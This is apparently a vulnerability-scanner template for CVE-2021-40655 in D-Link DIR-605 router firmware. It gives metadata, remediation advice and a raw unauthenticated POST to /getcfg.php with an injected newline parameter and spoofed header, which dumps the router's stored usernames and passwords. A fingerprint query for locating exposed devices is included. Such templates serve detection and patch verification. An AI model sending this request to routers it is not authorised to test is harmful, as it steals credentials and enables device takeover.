id: CVE-2021-40655

info:
  name: D-Link DIR-605 - Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version - 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page
  impact: |
    Unauthenticated attackers can obtain router credentials including usernames and passwords by exploiting information disclosure in the getcfg.php endpoint.
  remediation: |
    Apply firmware updates provided by D-Link or replace the device with a supported model.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2021-40655
    - https://github.com/Ilovewomen/D-LINK-DIR-605/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40655
    cwe-id: CWE-863
    epss-score: 0.92608
    epss-percentile: 0.99758
    cpe: cpe:2.3:o:dlink:dir-605l_firmware:2.01mt:*:*:*:*:*:*:*
  metadata:
    vendor: dlink
    product: dir-605l_firmware
    fofa-query: body="l_tb>DIR-605"
    max-request: 1
  tags: cve,cve2021,dlink,kev,dir-605,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /getcfg.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie:
        X-Forwarded-For: 127.0.0.1

        SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "DEVICE.ACCOUNT")'
        condition: and
# digest: 4b0a00483046022100f5edd20f88f2970fd486850b6cb236f0e5bfe7f71174e641c0ab2f7865f51313022100db6321ec4e51c0c1f912a8296cfd4cb19845a9ff80a5a7d5545ca59823023f29:922c64590222798bb761d5b6d8e72950